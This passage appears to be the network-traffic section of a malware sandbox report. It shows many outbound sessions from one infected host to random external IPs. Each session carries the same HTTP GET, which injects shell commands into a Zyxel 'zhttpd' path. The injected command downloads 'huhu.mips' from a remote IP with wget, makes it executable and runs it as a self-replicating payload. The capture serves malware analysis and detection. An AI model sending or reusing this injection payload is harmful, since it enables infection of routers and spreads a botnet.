                                              Jan 29, 2024 07:03:38.796314955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1730192.168.2.1444800195.84.37.199443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.796348095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1731192.168.2.1452428108.208.3.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.796391964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1732192.168.2.1459212116.179.45.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.796446085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1733192.168.2.145933813.101.16.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.796453953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1734192.168.2.1434612220.164.201.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.796499014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1735192.168.2.1433824181.140.43.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.796525955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1736192.168.2.145162835.178.234.23443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.796550989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1737192.168.2.1434272132.48.177.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.796581984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1738192.168.2.145990291.208.21.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.796638966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1739192.168.2.1442188111.255.157.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.796663046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1740192.168.2.1442654175.181.1.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.796720028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1741192.168.2.143436638.164.161.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.796741009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1742192.168.2.1457710162.121.93.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.796794891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1743192.168.2.1448258166.44.163.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.796837091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1744192.168.2.1446306190.77.243.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.796871901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1745192.168.2.1460506213.20.82.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.800465107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1746192.168.2.145067463.17.35.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.800496101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1747192.168.2.143504214.91.203.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.800545931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1748192.168.2.144656069.62.45.174443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.800573111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1749192.168.2.1454244126.20.102.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.800626040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1750192.168.2.143535296.56.124.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.800657034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1751192.168.2.1440530223.121.38.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.800717115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1752192.168.2.1457888140.228.157.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.800743103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1753192.168.2.1450104165.67.8.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.800790071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1754192.168.2.145068061.47.152.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.794409037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1755192.168.2.1452834148.193.109.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.794522047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1756192.168.2.1459444129.248.101.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.794560909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1757192.168.2.1452968126.255.93.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.794596910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1758192.168.2.144969269.156.118.231443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.794632912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1759192.168.2.1447566156.34.187.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.794676065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1760192.168.2.145624495.164.223.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.794709921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1761192.168.2.1454282100.245.88.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.794750929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1762192.168.2.144446257.130.252.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.794780016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1763192.168.2.144690689.190.254.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.794817924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1764192.168.2.1458262142.43.119.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.794876099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1765192.168.2.1434420150.45.223.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.794893980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1766192.168.2.1440606202.38.154.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.794934034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1767192.168.2.145314278.148.26.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.794991970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1768192.168.2.1447394202.164.43.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.795010090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1769192.168.2.1448064152.55.246.32443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.795048952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1770192.168.2.145347468.5.97.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.795099974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1771192.168.2.1433746147.21.51.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.795125008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1772192.168.2.144199254.102.210.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.795181990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1773192.168.2.1453180174.182.247.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.795237064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1774192.168.2.144654819.217.57.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.795272112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1775192.168.2.145516039.235.199.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.795300007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1776192.168.2.1433038191.16.234.186443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.795336008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1777192.168.2.1435432211.161.129.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.795376062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1778192.168.2.145055669.228.43.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.795413971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1779192.168.2.1448726201.151.251.217443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.795434952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1780192.168.2.144952824.241.159.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.795492887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1781192.168.2.1437838198.205.104.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.795531988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1782192.168.2.143893668.104.140.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.795550108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1783192.168.2.144882062.123.244.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.795591116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1784192.168.2.145393684.219.25.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.795639038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1785192.168.2.1450682129.234.147.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.795672894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1786192.168.2.1434084107.172.185.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.795692921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1787192.168.2.144284846.178.79.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.795731068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1788192.168.2.1444964129.75.137.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.795772076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1789192.168.2.145897066.86.55.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.795814037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1790192.168.2.1447238115.58.208.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.795846939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1791192.168.2.1451558137.188.250.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.795897961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1792192.168.2.1456894164.73.97.125443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.795928955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1793192.168.2.143336227.97.104.42443
                                              TimestampBytes transferredDirectionData
